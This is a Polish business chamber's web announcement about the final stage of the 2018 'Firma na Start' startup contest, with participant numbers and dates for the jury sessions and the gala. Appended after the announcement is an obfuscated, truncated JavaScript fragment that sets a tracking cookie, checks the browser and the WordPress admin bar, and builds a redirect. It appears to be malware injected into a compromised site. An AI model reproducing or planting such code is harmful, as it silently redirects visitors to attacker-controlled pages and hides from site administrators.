Finałowy etap konkursu Firma na Start | Północna Izba Gospodarcza w Koszalinie
Szanowani Państwo,
miło jest nam poinformować, że właśnie weszliśmy  w finałowy etap konkursu Firma na Start obejmujący prezentacje Uczestników Kapitule Konkursowej oraz wybór Laureatów Konkursu.
Spośród zgłoszonych do Konkursu 30 Uczestników (18 Kategoria I. i 12 Kategoria II. ), po odbytych szkoleniach swoje biznesplany w wymaganym terminie złożyło łącznie 16 osób  (Kategoria I. – 10; Kategoria II. – 6).
Obrady Kapituły Konkursowej zaplanowane zostały na dzień 7 i 8 czerwca  2018 r.
Natomiast laureatów trzeciej edycji Konkursu Firma na Start poznamy podczas uroczystej Gali Finałowej zaplanowanej na dzień 19 czerwca 2018 r. na godzinę 15.30, na która już dziś Państwa jako Partnerów Konkursu serdecznie zapraszam i bardzo proszę o zarezerwowanie sobie tego terminu właśnie na finał Konkursu.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m